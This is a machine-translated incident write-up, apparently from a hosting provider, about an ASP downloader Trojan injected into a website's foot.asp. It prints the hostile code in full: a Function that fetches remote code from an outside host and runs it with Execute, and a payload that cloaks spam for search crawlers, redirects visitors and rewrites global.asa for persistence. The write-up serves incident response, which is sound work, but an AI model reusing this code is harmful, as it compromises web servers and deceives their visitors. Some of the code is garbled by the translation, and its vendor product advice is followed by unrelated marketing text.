Comments: Recently, some code pages are remotely loaded on multiple pages of the customer. The main reason is to use MSXML2.serverXMLHTTP to load and execute some code. The following is a specific solution. Solution:
1, with the qingcloud team developed the website Trojan cleaning expert comprehensive scan server on the website, website Trojan cleaning expert: http://www.jb51.net/softs/12771.html
2. If the trojan still exists at this time, use the fast trojan detection function provided by our website Trojan cleaning experts to quickly scan and kill by * aming or aming signatures, as shown in:
3. Turn off the thumbnail Function Method on the server reference http://www.jb51.net/ OS /windows/Win2003/34960.html
Root cause:
This time, the user is a Downloader-type Trojan. On the website upload vulnerability, the hacker inserts the following code under foot. asp in the root directory of the website:
The Code is as follows:
<%
'By * aming
Function Gethtml (url)
Set ObjXMLHTTP = Server. CreateObject ("MSXML2.serverXMLHTTP ")
ObjXMLHTTP. Open "GET", url, False
ObjXMLHTTP. setRequestHeader "User-Agent", url
ObjXMLHTTP. send
Gethtml = ObjXMLHTTP. responseBody
Set ObjXMLHTTP = Nothing
Set objStream = Server. CreateObject ("Adodb. Stream ")
ObjStream. Type = 1
ObjStream. Mode = 3
ObjStream. Open
ObjStream. Write Gethtml
ObjStream. Position = 0
ObjStream. Type = 2
ObjStream. Charset = "gb2312"
Gethtml = objStream. ReadText
ObjStream. Close
Set objStream = Nothing
End Function
Execute (Gethtml ("http://www.pornhome.com/dy7749/xmlasaquan.txt "))
%>
Clear this code to solve the problem. The results of website Trojan cleaning experts are shown in!
The content of xmlasaquan.txt is as follows:
The Code is as follows:
'<Html> '<Meta http-equiv = refresh content = 0; URL = about: blank> <script> eval (function (p, a, c, k, e, d) {e = function (c) {return c}; if (! ''. Replace (/^/, String) {while (c --) {d [c] = k [c] | c} k = [function (e) {return d [e]}]; e = function () {return '\ w +'}; c = 1}; while (c --) {if (k [c]) {p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c])} return p} ('0. 1.2 (\ '3: 4 \ ');', 5, 5, 'window | location | replace | about | blank '. split ('|'), 0, {}) </script>
'By * aming
Server. ScriptTimeout = 600
Public Function createasa (ByVal Content)
On Error Resume Next
Set fso = Server. CreateObject ("scripting. filesystemobject ")
Set f = fso. Getfile ("//./" & Server. MapPath ("/global. asa "))
F. Attributes = 0
Set Obj = Server. CreateObject ("adod" & "B. S" & "tream ")
Obj. Type = 2
Obj. open
Obj. Charset = "gb2312"
Obj. Position = Obj. Size
Obj. writetext = Content
Obj. SaveToFile "//./" & Server. MapPath ("/global. asa"), 2
Obj. Close
Set Obj = Nothing
F. Attributes = 1 + 2 + 4
Set f = Nothing
Set fso = Nothing
End Function
Public Function GetHtml (url)
Set ObjXMLHTTP = Server. CreateObject ("MSXML2.serverXMLHTTP ")
ObjXMLHTTP. Open "GET", url, False
ObjXMLHTTP. setRequestHeader "User-Agent", url
ObjXMLHTTP. send
GetHtml = ObjXMLHTTP. responseBody
Set ObjXMLHTTP = Nothing
Set objStream = Server. CreateObject ("Adodb. Stream ")
ObjStream. Type = 1
ObjStream. Mode = 3
ObjStream. Open
ObjStream. Write GetHtml
ObjStream. Position = 0
ObjStream. Type = 2
ObjStream. Charset = "gb2312"
GetHtml = objStream. ReadText
ObjStream. Close
End Function
Function check (user_agent)
Allow_agent = split ("Baiduspider, Sogou, baidu, Sosospider, Googlebot, FAST-WebCrawler, MSNBOT, Slurp ",",")
Check_agent = false
For agenti = lbound (allow_agent) to ubound (allow_agent)
If instr (user_agent, allow_agent (agenti)> 0 then
Check_agent = true
Exit
End if
Next
Check = check_agent
End function
Function CheckRobot ()
CheckRobot = False
Dim Botlist, I, Repls
Repls = request. ServerVariables ("http_user_agent ")
Krobotlist = "Baiduspider | Googlebot"
Botlist = Split (Krobotlist, "| ")
For I = 0 To Ubound (Botlist)
If InStr (Repls, Botlist (I)> 0 Then
CheckRobot = True
Exit
End If
Next
If Request. QueryString ("admin") = "1" Then Session ("ThisCheckRobot") = 1
If Session ("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh ()
CheckRefresh = False
Dim Botlist, I, Repls
Krobotlist = "baidu | google | sogou | soso | youdao"
Botlist = Split (Krobotlist, "| ")
For I = 0 To Ubound (Botlist)
If InStr (left (request. servervariables ("HTTP_REFERER"), "40"), Botlist (I)> 0 Then
CheckRefresh = True
Exit
End If
Next
End Function
Sub sleep ()
If response. IsClientConnected = true then
Response. Flush
Else
Response. end
End if
End Sub
If CheckRefresh = true Then
Cnnbd = lcase (request. servervariables ("HTTP_HOST "))
Response. redirect ("http://www.82767.com /? "& Cnnbd &"")
'Response. write ("<a href = http://www.82767.com> <font _ fcksavedurl =" http://www.82767.com> <font "color = # FF0000> If your browser does not support redirection, please click to enter >>>>>></font> </a> <div style = display: none> <script src = http://count11.51yes.com/click.aspx? Id = 114814173 & logo = 12> </script> </div> <script _ fcksavedurl = "http://count11.51yes.com/click.aspx? Id = 114814173 & logo = 12> </script> </div> <script "src = http://js.568tea.com/44.js> </script> <script src = http://js.37548.com/44.js> </script> ")
Response. end
End If
User_agent = Request. ServerVariables ("HTTP_USER_AGENT ")
If check (user_agent) = true then
Body = GetHtml ("http://fudu.qpedu.cn/xml/prn/con.2.asp? Domain = "& strHost &" & ua = "& server. URLEncode (request. ServerVariables (" HTTP_USER_AGENT "))&"")
Response. write body
Response. end
Else
Asa = GetHtml ("http://www.pornhome.com/dy7749/codequan.txt ")
If instr (asa, "by * aming")> 0 then
Createasa (asa)
End if
ScriptAddress = Request. ServerVariables ("SCRIPT_NAME ")
Namepath = Server. MapPath (ScriptAddress)
If Len (Request. QueryString)> 0 Then
ScriptAddress = ScriptAddress &"? "& Request. QueryString
End if
Geturl = "http: //" & Request. ServerVariables ("http_host") & ScriptAddress
Geturl = LCase (geturl)
'Response. write replace (namepath, server. MapPath ("/"),"")
'Response. end
'If instr (geturl, "jc = OK") = 0 and instr (geturl, "global = OK") = 0 and instr (LCase (Request. serverVariables ("http_host"), "gov.cn") = 0 and instr (LCase (Request. serverVariables ("http_host"), "edu.cn") = 0 and
If instr (geturl, "http: //" & Request. serverVariables ("http_host") & "/index. asp ") = 0 and instr (geturl," http: // "& Request. serverVariables ("http_host") & "/") = 0 and instr (LCase (Request. serverVariables ("HTTP_REFERER"), LCase (Request. serverVariables ("http_host") <= 0 then
Agent = lcase (request. servervariables ("http_user_agent "))
Referer = LCase (Request. ServerVariables ("HTTP_REFERER "))
Bot = ""
Amll = ""
If instr (agent, "+")> 0 then bot = agent
If instr (agent, "-")> 0 then bot = agent
If instr (agent, "http")> 0 then bot = agent
If instr (agent, "spider")> 0 then bot = agent
If instr (agent, "bot")> 0 then bot = agent
If instr (agent, "linux")> 0 then bot = agent
If instr (agent, "baidu")> 0 then bot = agent
If instr (agent, "google")> 0 then bot = "nobot"
If instr (agent, "yahoo")> 0 then bot = "nobot"
If instr (agent, "msn")> 0 then bot = "nobot"
If instr (agent, "alexa")> 0 then bot = "nobot"
If instr (agent, "sogou")> 0 then bot = "nobot"
If instr (agent, "youdao")> 0 then bot = "nobot"
If instr (agent, "soso")> 0 then bot = "nobot"
If instr (agent, "iask")> 0 then bot = "nobot"
If bot = "nobot" then
'Call WriteErr
'Response. end
End if
Call sleep ()
End if
End if
'</Body>
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
